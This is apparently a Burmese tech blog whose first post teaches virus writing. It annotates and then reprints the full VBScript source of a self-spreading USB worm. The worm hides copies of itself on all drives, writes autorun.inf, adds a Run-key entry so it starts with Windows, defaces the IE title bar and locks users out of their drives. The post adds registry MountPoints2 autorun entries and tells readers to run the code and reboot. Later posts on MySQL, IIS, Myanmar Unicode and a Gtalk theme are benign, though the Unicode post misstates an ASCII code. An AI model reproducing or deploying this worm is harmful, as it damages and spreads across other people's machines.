Virus ရေးမယ်…

ကျွန်တော့်ကို တော်တော်များများမေးတယ်ဗျ…. Virus ရေးတတ်လားတဲ့… ကျွန်တော်ကတော့ ပြောတာပေါ့…ရေးတတ်တာပေါ့… ဘယ်လိုရေးလဲ လို့ထပ်မေးပြန်ရော… Window ရဲ့ အားသာချက်တွေက Window ရဲ့ အားနည်းချက်တွေပဲလေ… သူ့မှာပေးထားတဲ့ Feature တွေကနေ တဆင့် virus ကို အလုပ်လုပ်သွားရတယ်.. တနည်းအားဖြင့်ပြောရင်ဗျာ… Virus ဆိုတာ windows ရဲ့ အားနည်းချက်ကို အသုံးချသွားတာပဲ… Windows က လုပ်ခွင့်ပေးလို့လုပ်လိုက်တာ… အဲဒါကြောင့် ကြိုက်တဲ့ Programming နဲ့ရေးရတယ်… Windows အကြောင်းနားလည်ရင်ပြီးရော…အဲလို ပြောလိုက်တော့.. သူတို့တွေလည်း မသိတော့ဘူး…ရှုပ်သွားရော… ကျွန်တော်လည်း ဘယ်လိုရှင်းပြရှင်းပြ Logic ပဲရှင်းပြနိုင်တယ်… source code လိုက်ရှင်းပြဖို့ အခွင့်မသာခဲ့ဘူးဗျ… အခု ကျွန်တော် virus ကောင်းကောင်းလေးတစ်ခုရဲ့ source code နဲ့ တကွ ဒီမှာရှင်းပြပေးမလို့… ဒီ source code က ကျွန်တော့်ဆီ ဝင်ထားတဲ့ virus တစ်ခုရဲ့ source code ဗျ… ကျွန်တော်ရေးထားတာတော့ မဟုတ်ဘူး….

‘My name is Slow but sure V0.04
‘This is a virus
‘Don’t Save this file name as MS32DLL.dll.vbs and then don’t run

on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”

File autorun အတွက် ရေးထားတာပါ…နောက်ပိုင်း text file အတွက် အသုံးပြုရန် အတွက် variable name အဖြစ်အသုံးပြုထားတာပါ…

set fs = createobject(“Scripting.FileSystemObject”)

File System Object တစ်ခုကို create လုပ်လိုက်တာ….

set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)

do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop

ဒီအဆင့်တွေကတော့ အခု run နေတဲ့ File ကို ပြန်ဖတ်လိုက်တာပေါ့… ဘယ်လိုလည်းဆိုရင် Script File တစ်ခုလုံးကို text file အဖြစ်စာတစ်ကြောင်းစီဖတ်ပြီး mysource ဆိုတဲ့ variable name ထဲမှာသွားသိမ်းထားတယ်… ဘာဖြစ်လို့လည်းဆိုရင် ဒီ script file ကိုပွားမလို့ပေါ့…..

do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)

ဒါကတော့ windows ရဲ့ မူရင်း path ( C:\Windows ) အောက်မှာ MS32DLL.dll.vbs ဆိုတာကိုသွားစစ်ကြည့်တာ….

tf.attributes = 32

ပြီးတော့ အဲဒီ File ရဲ့ attributes ကို 32 ပေးလိုက်တာ…အဲဒီ File ကို Archive Properties ပြောင်းလိုက်တာ…

set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close

အဲဒီ File ထဲမှာ မူရင်း MS32DLL.dll.vbs ကိုရေးထည့်လိုက်တာ… ကျွန်တော်တို့ အစပိုင်းမှာ run နေတဲ့ script file ကို mysource variable ထဲမှာသိမ်းထားခဲ့တယ်…အဲဒီဟာကို ရေးထည့်လိုက်တာ..

set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39

ရေးပြီးသား File ကို attributes ထပ်ပြောင်းလိုက်တာ… System, Archive, Read-only ,Hidden အဖြစ်ပြောင်းလိုက်တာ…

for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next

Run နေတဲ့ အချိန်မှာ Drive တွေကိုစစ်တယ်..ရှိသမျှ Drive တွေထဲမှာ virus File ကိုသွားရေးတာ….MS32DLL.dll.vbs နဲ့ autorun.inf file ကိုသွားရေးလိုက်တာ…

set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Godzilla”

windows registry မှာသွားရေးတာ…ဘာလုပ်ဖို့လည်းဆိုရင် Windows တက်တက်ချင်း Virus File run ဖို့အတွက်ပေါ့…. တစ်ခုကတော့ ဒီ virus ကိုက်ခံထိထားကြောင်းသိဖို့အတွက် IE Title Bar မှာ Hack by Godzilla ဆိုပြီးရေးလိုက်တာ..

if check <> 1 then

Wscript.sleep 200000

ဒီနေရာမှာ ကြိုက်တာကိုရေးလို့ရတာ…ကျွန်တော်ပြောတာက ကြိုက်တဲ့ vbscript ကိုရေးလို့ရတယ်လို့ဆိုလိုတာ.. အခုဆိုရင် ဒီ virus ကြောင့် Drive က မပွင့်အောင်လုပ်ထားလိုက်တာ… Drive ဖွင့်ဖို့ဆိုရင် 200000 second လောက်စောင့်ရလိမ့်မယ်…

end if
loop while check<>0

ဒီဟာက virus ကို အမြဲအလုပ်လုပ်ဖို့အတွက် looping ပတ်ထားတာ…

set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

အကြောင်းအမျိုးမျိုးကြောင့် virus က looping က ထွက်ခဲ့သည်ဖြစ်သော်.. Script မ run ခဲ့ဘူးဆိုရင် explore.exe ကနေတဆင့် run ခိုင်းလိုက်တာပါ….

အောက်ကဟာကတော့ အစအဆုံး ရေးထားတဲ့ code ပါ…

‘My nam

e is Slow but sure V0.04
‘This is a virus
‘Don’t Save this file name as MS32DLL.dll.vbs and then don’t run
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe MS32DLL.dll.vbs”
set fs = createobject(“Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\MS32DLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\MS32DLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\MS32DLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(“WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\MS32DLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by Godzilla”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>0
set sd = createobject(“Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname

ဒီ virus ကိုဘာနဲ့ပဲစစ်စ် သူ့ကို virus မှန်းမသိဘူး…ဘာဖြစ်လို့လည်းဆို သူက script file ဖြစ်တဲ့အပြင် Internal Name မပါဘူး… နောက်ပြီး File Attributes ကလည်း System, Archive, Read-only ,Hidden ဖြစ်နေတယ်… ဘယ်လိုမှ မြင်ရမှာ မဟုတ်ဘူး… နောက်ပြီး File ကို ဖျက်ဖို့ကလည်းမလွယ်ဘူးဗျ…. သူ့ကို နိုင်တာကတော့ Win Rar ပဲ… Win Rar ကနေ File တွေကိုကြည့်ရင် အကုန်မြင်ရတယ်… အကုန် rename ပေးလို့ရတယ်… Delete လုပ်လို့ရတယ်ဗျ… နောက်တနည်းကတော့ Tool-> Folder Option -> View -> Hide protected operation system file ဆိုတာကို uncheck လုပ်လိုက်ရင်တော့ အကုန်မြင်ရပါမယ်… ဖျက်လို့လည်းရသွားပါမယ်…မှား မဖျက်နဲ့နော်… autorun.inf ရယ်… MS32DLL.dll.vbs ရယ်ပဲ…

ဒီ Virus ကို ဖျက်ချင်ရင်တော့ Ctrl+Shift+ESC ကိုနှိပ်… Process မှာ Wscript.exe ကိုရှာ… ရှိသမျှ Wscript.exe တွေကို end process လုပ်… win rar ဖွင့်… C:\ D:\ နောက်ပြီး Flash Drive တို့အောက်တွေကို Win Rar နဲ့ကြည့်…ပြီးရင် MS32DLL.dll.vbs နဲ့ autorun.inf ကို ဖျက်လိုက်… ပြီးရင် run ကိုသွား… regedit လို့ရိုက်လိုက်… MS32DLL.dl.vbs ကိုရှာ… တွေ့ရင် ဖျက်လိုက်….

ဒီလောက်ဆိုရင်တော့ virus ရေးရတာ မခက်မှန်းသိလောက်ပြီထင်တယ်… virus ရေးလို့အကောင်းဆုံးကတော့ VB script နဲ့ရေးရတာပဲ… programming နဲ့ရေးချင်လည်းရတယ်… windows အကြောင်းနားလည်ဖို့ရယ်… ကိုယ်ရေးမယ့် programming language မှာ File System ပိုင်းက ကောင်းကောင်းရေးတတ်ဖို့လိုတယ်.. နောက်ပြီး Virus EXE အပြင် အဲဒီ File ကို user က သိသွားရင် ပြန်ပြီး create လုပ်ပြီး run ခိုင်းဖို့ exe တော့လိုတယ်.. တနည်းအားဖြင့်ပြောရင် Virus EXE နဲ့ support ပေးတဲ့ exe က တစ်ခုပိတ်လိုက်တာနဲ့ ပြန်ပွင့်ပေးအောင်လုပ်ပေးရလိမ့်မယ်.. support exe ပိတ်ရင် virus exe ကပြန်ဖွင့်… virus exe ပိတ်ရင် support exe က ပြန်ဖွင့်ဖို့ပေါ့.. နောက်တစ်ခုလိုတာကတော့ C: drive D: drive တို့အတွက် auto run file ပဲ… သူ့ကို ဘယ်လိုရေးရလည်းဆိုရင် တော့ ကိုယ့်ကျွမ်းကျင်ရာ programming language မှာ registery ပိုင်းကိုရေးတတ်ဖို့လိုတယ်.. ကျွန်တော်ကတော့ ရိုးရိုး .reg file မှာရေးတဲ့ text ကိုပြပါမယ်…

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{9f6656ed-8a32-11db-a7d8-806d6172696f}\Shell\AutoRun\command]
@=”C:\\testvirus.exe”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{9f6656ee-8a32-11db-a7d8-806d6172696f}\Shell\AutoRun\command]
@=”C:\\testvirus.exe”

အဲဒါကိုတာ run လိုက်ရင် C: ရော D: ရောမှာပါ ဖွင့်လိုက်ရင် C:\testvirus.exe ကိုပဲ run နေပါလိမ့်မယ်…. C:\ D:\ တို့ကို My Computer ကနေ ဖွင့်လို့မရတော့ဘူး… Windows Explorer ကနေပဲဖွင့်လို့ရလိမ့်မယ်…

ကိုယ့် virus က Drive တွေကို အကုန်လုံးရဲ့ autorun မှာ အလုပ်လုပ်ချင်ရင်တော့ HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ အောက်မှာရှိတဲ့ {….} Folder တွေအားလုံးကို အပေါ်မှာ ပြထားတဲ့အတိုင်း ရေးလိုက်ရုံပါပဲ…အပေါ်မှာကတော့ C:\ D:\ အတွက်ပဲပြထားတာပါ…အဲဒီ အပိုင်းက ကိုယ့် programming ကျွမ်းကျင်မှုအပိုင်းနဲ့တော့ဆိုင်ပါတယ်..

CD Drive နဲ့ Flash Drive အတွက်ဆိုရင်တော့ autorun file ရေးထားရင်ရပါတယ်…

[autorun]
Open=testvirus.exe

ဆိုပြီး autorun.inf နဲ့သိမ်း file နဲ့နေရာအတူတူမှာ testvirus.exe ကိုထား…အဲဒါဆိုရင် အခွေထည့်လိုက်တာနဲ့ program က အလုပ်လုပ်ပါပြီ….

အပေါ်က VBScipt ဆိုရင်တေ

ာ့ အဲဒီ registry ပိုင်းကို အလိုအလျှောက်လုပ်ပေးတယ်…ဘာကြောင့်လည်းဆို windows စစခြင်းမှာ wscript.exe ကို explorer.exe \e,\select နဲ့ run လိုက်တာကြောင့်ပါ… အပေါ်က code ကို MS32DLL.dll.vbs နဲ့ save လုပ် run… ပြီးရင် စက်ကို restart ချလိုက်….ပြီးရင် Drive မှန်သမျှ၀င်လို့မရတော့တာကိုတွေ့ရပါလိမ့်မယ်…

ဒီလောက်ဆိုရင်တော့ virus ဆိုတာဘယ်လိုရေးလဲဆိုတာသိလောက်ပြီလို့ထင်ပါတယ်…
ကိုယ့်ပျော်ရွှင်မှုကြောင့် သူတစ်ပါး စိတ်မဆင်းရဲရပါစေနဲ့လို့ ဆုတောင်းပေးလိုက်ပါတယ်….


MySQL

MySQL ဟာ Free Database Software တစ်ခုပါ… MySQL ဟာ Free Version တင်မက Enterprise version ပါရှိပါတယ်… အဲဒီဟာကို တော့ ၀ယ်ယူရပါတယ်… Free Version ဆိုပေမယ့် မဆိုးဘူးဗျ… Microsoft SQL Sever က မြန်မာနိုင်ငံမှာ စျေးပေါပေါနဲ့၀ယ်လို့ရတာကို…ဒီတော့ MySQL လို အလကားရတဲ့ဟာကို လူတွေက မသိတော့ဘူး… MySQL က Window မှာရော Linux မှာပါ အသုံးပြုနိုင်တယ်…. PHP အတွက်တော့ အကောင်းဆုံးပဲ… MySQL ကို programming Language တော်တော်များများနဲ့ အသုံးပြုနိုင်အောင် Driver များလည်းရှိတယ်.. ရနိုင်တဲ့ driver တွေကတော့
These drivers are developed and maintained by MySQL AB
ADO.NET Driver for MySQL (Connector/NET)
ODBC Driver for MySQL (Connector/ODBC)
JDBC Driver for MySQL (Connector/J)
MXJ Driver for MySQL (Connector/MXJ)
PHP Driver for MySQL (Connector/PHP – Windows Only)
C API for MySQL (mysqlclient)
These drivers are developed and maintained by the MySQL Community.
PHP Driver for MySQL (mysqli)
Perl Driver for MySQL (DBD::mysql)
Python Driver for MySQL (MySQLdb)
Ruby Driver for MySQL (DBD::MySQL)
Ruby Driver for MySQL (ruby-mysql)
C++ Wrapper for MySQL C API (MySQL++)
အစရှိတဲ့ ဟာတွေကို http://www.mysql.com/products/connector/ ကနေ download ချနိုင်ပါတယ်…
ကျွန်တော်ကတော့ အဓိက php အတွက်ပဲသုံးပါတယ်…ဘာဖြစ်လို့လည်းဆို PHP မှာ MySQL အတွက် သုံဖို့အသင့်ပါပြီး ဖြစ်သလို web hosting တွေမှာလည်း free ပေးလို့ပါ… နောက်ပြီး PHP သမားတွေကိုလည်း MySQL သုံးဖို့ပြောချင်တယ်ဗျ… စာအုပ်တော်တော်များများမှာ PHP ကို MySQL နဲ့သုံးနည်းတွေပဲရေးထားကြတယ်… တခြားဟာတွေနဲ့ တွဲသုံးဖို့အပိုင်းတွေကို မတွေ့ရဘူးဗျ….
MySQL ကို http://dev.mysql.com/downloads/mysql/5.2.html ကနေ download ချနိုင်ပါတယ်.. GUI Tool ကိုတော့ http://dev.mysql.com/downloads/gui-tools/5.0.html ကနေ download ချလို့ရပါတယ်.. ကျွန်တော်ကတော့ MySQL ကော GUI Tool ကိုရော download ချသင့်တယ်လို့ထင်တယ်..ဘာဖြစ်လို့လည်းဆို MySQL ပဲဆိုရင် command mode မှာအသုံးပြုရလိမ့်မယ်… Datbase တစ်ခုဆောက်ဖို့ဆိုရင် အချိန်တွေ အများကြီးပေးရမယ်ဗျ… နောက်ပြီး GUI Tool တင်မဟုတ်ဘူး… PhpMyAdmin (http://www.phpmyadmin.net/ ) ကိုပါ download ချစေချင်တယ်… PhpMyAdmin ကတော့ တခြားမဟုတ်ဘူးဗျ…သူက MySQL Sever ကို GUI Design နဲ့ပြန်လုပ်ထားတာပဲ…PHP နဲ့ရေးထားတဲ့ opensource ပဲပေါ့…. သူ့ကိုတော့ MySQL သုံးတဲ့သူတွေ သုံးကိုသုံးသင့်တယ်… သူက database က data တွေကို export , input လုပ်လို့ရတယ်…နောက်ပြီး… web hosting တွေကလည်း PhpMyAdmin ကိုသုံးတယ်… သူ့ကိုသုံးမှ ကိုယ့်စက်ထဲက data တွေကို web hosting က MySQL Server ပေါ်တင်ရင် မြန်မယ်… ကိုယ့်စက်နေ export လုပ်…. Web hosting မှာ input လုပ်ရင်ရပြီ… အစပိုင်းသုံးရတာ နည်းနည်းရှုပ်ပေမယ့်…နောက်ပိုင်းသုံးတတ်ရင်တော့ တော်တော်ကောင်းတယ်ဆိုတာကို တွေ့ရမှာ… အဲသူက php နဲ့ရေးထားတာနော်… Web browser မှာ run ပြီးသုံးရတာ… Application မဟုတ်ဘူးဗျ….


Your Freedom ကိုမြန်အောင်လုပ်မယ်

Your Freedom ကိုသုံးမယ် ဆိုရင် Account တစ်ခုတော့ လိုတယ်ဗျ…အခုလတ်တလော မြန်မာနိုင်ငံမှာ ဖြစ်နေတဲ့ ပြသနာက port HTTPS နဲ့သုံးတော့ မရဘူးဖြစ်နေတာပေါ့….HTTP ကိုသုံးပါ…ဒါဆိုရင် ရပါတယ်….နောက်ပြီး Address ကို အမြဲပုံသေမထားနဲ့…ပုံသေဆိုရင် connection ကနှေးသွားရော…၁ လ ၁ကြိမ်လောက်ပြောင်းပေး….ဘာကြောင့်လဲဆို freedom server ကိုကပြောင်းနေတော့…ကိုယ်ပါလိုက်ပြောင်းရတာပေါ့…..

ဘယ်လိုပြောင်းရမလဲဆိုရင်…..Freedom ကိုဖွင့်…Configure ကို၀င်…အောက်မှာ User Wizard ဆိုတာပါတယ်… Next တွေလုပ်သွား….Server ရှာနေတဲ့အချိန် ခဏလောက်စောင့်လို်က်…ပြီးရင် sever တွေက ရွေးတဲ့အခါမှာ HTTP တစ်ခုတည်း support လုပ်တဲ့ဟာပါရင် ရွေးလိုက်…မပါရင် HTTP support လုပ်တာကိုရွေးလိုက်….ပြီးရင် Protocol ကို HTTP ပြောင်းလိုက်…Save And Exit လုပ်….ပြီးရင် Start Connection လုပ်…ပိုမြန်တာကိုတွေ့လိမ့်မယ်….


Internet Information Services (IIS)

IIS ဆိုတာ Internet Information Services ကိုပြောတာပါ။ သူက ဘာတွေလုပ်ပေးသလဲဆိုင် web programming တွေနဲ့ browser တွေကြားမှာ ကြားခံဆောင်ရွက်ပေးပါတယ်။ PHP နဲ့ရေးထားတဲ့ code ကို IIS ကနေတဆင့် browser မှာ HTML ပုံစံပေါ်အောင် တဆင့်ခံပြုလုပ်ပေးတာပါ။ ASP , ASP.NET တို့ code တွေကိုလည်း HTML code ထွက်လာအောင် ကြားခံဆောင်ရွက်ပေးတာပါ။ IIS လိုမျိုး ဟာတွေကတော့ Apache ပဲဖြစ်ပါတယ်။ IIS က windows တွေမှာပဲ အသုံးပြုနိုင်ပြီးတော့ Apache ကတော့ Linux ရော Windows မှာပါသုံးနိုင်ပါတယ်။ နှစ်ခုလုံးက free ရဲ့တဲ့ဟာတွေဖြစ်ပြီး IIS က built-in ပါပြီးသားပါ။

IIS ကိုသွင်းမယ်ဆိုရင် Control Panel  Add Remove Program ကိုဖွင့်လိုက်ပါ။ Dialog တက်လာရင် Add Remove Component ကိုရွေးလိုက်ပါ။ နောက် box ထက်တက်လာပါမယ်။ အဲမှာ Internet Information Services (IIS) ကို check လိုက်ပါ။ ပြီးရင် OK နှိပ်ပါ။ အဲဒီအခါ windows အခွေတောင်းပါမယ်။ CD ထည့်ပေးလိုက်ပါ။သူ့ဘာသာသူ install လုပ်သွားပါမယ်။ ပြီးရင် Administrative Tool မှာ IIS ပါလာပါလိမ့်မယ်။


Unicode ဆိုတာ

Unicode ဆိုတာ တကယ်တန်းတော့ international အတွက်ပါ။ ဘာလဲဆိုရင် မင်း English စာဆိုရင် မင်းရိုက်လိုက်တဲ့ စာတွေကို computer ကစာအနေနဲ့သိမ်းထားတာ မဟုတ်ဘူး။ code နံပါတ်နဲ့သိမ်းလိုက်တာ။ A ဆိုရင် 65 ဆိုပြီး သိမ်းပြီး a ဆိုရင်တော့် 91 ဆိုပြီးသိမ်းပါတယ်။ English စာအတွက်က ASCII code ဆိုပြီးရှိပေမယ့် နိုင်ငံတကာအတွက်ဆိုရင် ASCII code ကမလုံလောက်တော့ဘူး။ ဘာဖြစ်လို့လည်းဆို ASCII code က စာလုံးရေ 255 လုုံးပဲသိမ်းနိုင်တယ်။ ဒါကြောင့်မို့ နိုင်ငံတကာ အတွက် Unicode ဆိုတာ ပေါ်လာတာ။ Unicode ကစာလုံးရေ အများကြီးဆန့်တယ်။ ကျွန်တော် သေသေချာချာ မမှတ်မိတော့လို့ပါ။ အဲဒီလိုပဲ မြန်မာစာ အတွက် Unicode ဆိုတာရှိပါတယ်။ win-innwa တို့ CE တို့ဆိုတာ Unicode မဟုတ်ပါဘူး။ ASCII code ကို စာလုံးပုံစံပြင်ထားတာပါ။ သဘောကတော့ဗျာ ေ ဆိုရင် 61 ဆိုပြီးသွားသိမ်းတယ်။ ဗ ဆိုရင် 41 ဆိုပြီးသိမ်းထားတယ်။ ဒါဟာ Unicode မဟုတ်ပါဘူး။ Font သက်သက်ပဲရှိတာပါ။ သဘောပေါက်အောင်ပြောရမယ်ဆိုရင်တော့ က ဆိုတာက u မဟုတ်ပါဘူး။ win တို့ ce တို့ သဘောက u ကို က လို့သတ်မှတ်တာပါ။ အမှန်တိုင်းဆိုရင် ကဆိုတာက Unicode 1000 ပါ။ Unicode 0075 မဟုတ်ပါဘူး။ ဒါကြောင့် မြန်မာတွေအတွက် Unicode ဆိုတာလိုလာပါတယ်။ Unicode ပထမဆုံး font ကတော့ Myazedi ပါ။ သူပေါ်လာပြီးနောက်မှ လူတွေက Unicode ကို စလုပ်လာတာပါ။ Unicode လုပ်နေတဲ့သူက အများကြီးပါ။ တချို့ကတော့ standard ဖြစ်နေပါပြီ။ တချို့ကတော့ မဖြစ်သေးပါဘူး။ ကျွန်တော် အခုသုံးနေတဲ့ Zawgyi-one က standard မဖြစ်ပါဘူး။ standard ဖြစ်တယ်ဆိုတာက rendering ပိုင်းမပါသေးဘူး။ code တွေ မမှန်သေးဘူး လို့ဆိုလိုတာပါ။ ဒါပေမယ့် web ပေါ်မှာ သူကပို အဆင်ပြေပါတယ်။ standard ဖြစ်တဲ့ဟာတွေက သိပ်အဆင်မပြေပါဘူး။ ဘာဖြစ်လို့လည်းဆို လူတိုင်းစက်မှာ rendering ကို မသွင်းထားလို့ပါ။

Rendering ဆိုတာဘာလဲဆိုတာဆက်ပြောပြပါမယ်။ rendering ဆိုတာက စာရေးသားဖို့ပါ။ ဖေဖေ ဆိုတာကို တကယ်တမ်း standard အရ computer မှာ ဖဖေေ ဆိုပြီးမှတ်သားထားပါတယ်။ ဘာဖြစ်လို့လည်းဆိုရင် ကခကေ မှာဆိုရင် ကကေခ ဆိုပြီး sorting လုပ်ရပါမယ်။ တကယ်လို့သာ ေ ကိုရှေ့မှာမှတ်ထားမယ်ဆိုရင် sorting ပိုင်းက ပြသနာတက်လာနိုင်ပါတယ်။ အဲဒီလို အပိုင်းတွေ မြန်မာစာ မှာ ရှိနေပါတယ်။ အဓိက sorting ပိုင်းကြောင့်ပါ။

Unicode font တစ်ခုထွင်ဖို့က မခက်ပါဘူး။ rendering ပိုင်းထည့်ဖို့ကလည်း မြန်မာစာပိုင်းသိတဲ့သူတစ်ယောက်ရှိရင်ရပါတယ်။ keyboard လုပ်ဖို့ကပိုတောင်လွယ်ပါသေးတယ်။ ဘာဖြစ်လို့လည်းဆို Microsoft က software တွေထုတ်ထားပြီးသားပါ။ သူပေးထားတဲ့ software တွေကနေ တဆင့် Unicode ကောင်းကောင်းလုပ်လို့ရပါတယ်။ နောက်ပြီး စာရို်က်ဖို့ အတွက်က keyman ဆိုတာရှိတယ်။ သူကဘာလုပ်ပေးလဲဆို ဖေဖေဆိုပြီးရိုက်လိုက်ရင် သူ့ဘာသူ ဖဖေဆေိုပြီး computer မှာ သိမ်းပေးပါတယ်။ အဓိကလိုအပ်တာက အချိန်ပါ။

External Link
Unicode.org
Unicode On Wiki
Microsoft VOLT
Keyman


Gtalk Theme ဘယ်လိုလုပ် ?

Windows -> Run -> “%HOMEPATH%\Local Settings\Application Data\Google\Google Talk\themes\system\chat” လို့ရိုက်လိုက်ပါ။

Copy BubblePicture and Past လုပ်ပါ။နောက်ပြီး ကြိုက်နှစ်သက်ရာ နာမည်ပေးပါ။ ကျွန်တော်ကတော့ MMBubblePicture ဆိုပြီးပေးလိုက်ပါပြီ။

Contents\Resources\main.css ကိုဖွင့်လိုက်ပါ။
DIV#content တွင် Font ကို Zawgyi-One ဖြည့်ထည့်လိုက်ပါ။

DIV#content {
font: 12px Zawgyi-One,Arial;
}

DIV.chat SPAN.salutation{….} တစ်ခုလုံးကို copy ကူးပြီး paste လုပ်လိုက်ပါ။ ထို့နောက် နောက်တွင် -i နှင့် -o ဖြည့်ထည့်လိုက်ပါ။

DIV.chat SPAN.salutation-i {
font-weight: bold;
display: block;
border-bottom: 1px solid #CDCDCD;
margin: 0px 0px 1px 40px;
}

DIV.chat SPAN.salutation-o {
font-weight: bold;
display: block;
border-bottom: 1px solid #CDCDCD;
margin: 0px 0px 1px 40px;
}

ထို့နောက် MMBubblePicture\Contents\Resources\Incoming\Content.html ကို html editor တစ်ခုခုနှင့်ဖွင့်လိုက်ပါ။

<span class=’salutation’>%sender%.. </span>

ကို

<span class=’salutation-i’>%sender% </span>

ဟုပြောင်းလိုက်ပါ။
ထို့နောက် MMBubblePicture\Contents\Resources\ Outgoing\Content.html ကို html editor တစ်ခုခုနှင့်ဖွင့်လိုက်ပါ။

<span class=’salutation’>%sender%.. </span>

ကို

<span class=’salutation-o’>%sender% </span>

ဟုပြောင်းလိုက်ပါ။
Main.css တွင်

DIV.out {
text-align: left;
filter: progid:DXImageTransform.Microsoft.Gradient(gradientType=’0′,startColorStr=’#FFFEEA’,endColorStr=’#F2F4CC’);
height: 1px;
}

၌ filter တွင် startColorStr နှင့် endColorStr ကို မိမိနှစ်သက်ရာ အရောင်ပြောင်းပါ။ ဒါမှ မဟုတ် မိမိနှစ်သက်ရာ background ထည့်နိုင်ပါတယ်။ကျွန်တော်ကတော့ ဒီလိုပြောင်းလိုက်တယ်။

DIV.out {
text-align: left;
/*filter: progid:DXImageTransform.Microsoft.Gradient(gradientType=’0′,startColorStr=’#FFFEEA’,endColorStr=’#F2F4CC’);*/
background-image:url(images/outgoing.jpg);
background-repeat:repeat-x;
background-color:#b0d7fb;
height: 1px;
}

DIV.t-o {
background-color: #FFFEEB;
}
DIV.b-o {
background-color: #F1F3CB;
}

တို့တွင်လည်း background-color ကို မိမိပြောင်းထားတာနှင့်လိုက်မည့် အရာင်ကို ပြောင်းလဲနိုင်ပါတယ်။ b က အောက်ဘက်ဖြစ်ပြီး t သည် အပေါ်ဘက်ဖြစ်သည်။
မိမိပြင်ထားသည့်ပုံစံကို gTalk ရဲ့ appearance တွင်ကြည့်နိုင်ပါတယ်။

ပြောင်းပြီး..

DIV.chat SPAN.salutation-o {

font-weight: bold;

display: block;

border-bottom: 1px solid #cdcdcd;
margin: 0px 0px 1px 40px;
}

တွင် border-bottom ၏ color ကို နှစ်သက်ရာပြောင်းပါ။

ကျွန်တော်တို့ Outgoing အတွက် ပြင်ပြီးပါပြီ။

အခု income အတွက်ပြင်ပါမယ်။ ပြင်ရတာ အတူတူပါပဲ ။ DIV.in ကို outgoing ပြင်သလိုပြင်လို့ရပါတယ်။ DIV.t-i, DIV.b-i က မပါလာပါဘူး ။ဒါကြောင့် အဲဒီနှစ်ခု ကို ထပ်ထည့်ပေးရပါတယ်။ DIV.in အောက်မှာ

DIV.t-i {
background-color: #dddcdd;
}
DIV.b-i {
background-color: #dfdfdf;
}

ဆိုပြီး ထပ်ဖြည့်ပါမယ်။ အရောင်ကတော့ မိမိနှစ်သက်ရာပေါ့။ ပြီးရင် DIV.chat SPAN.salutation-i မှာ border-color ကို မိမိ Design နဲ့လိုက်ဖက်သည့် ပုံစံကိုပြောင်းလဲနိုင်ပါတယ်။ ကဲ အခုအားလုံးပြင်ပြီး သွားပါပြီ။ သင့်ရဲ့ Design နဲ့ gTalk ကြည့်လိုက်ပါ။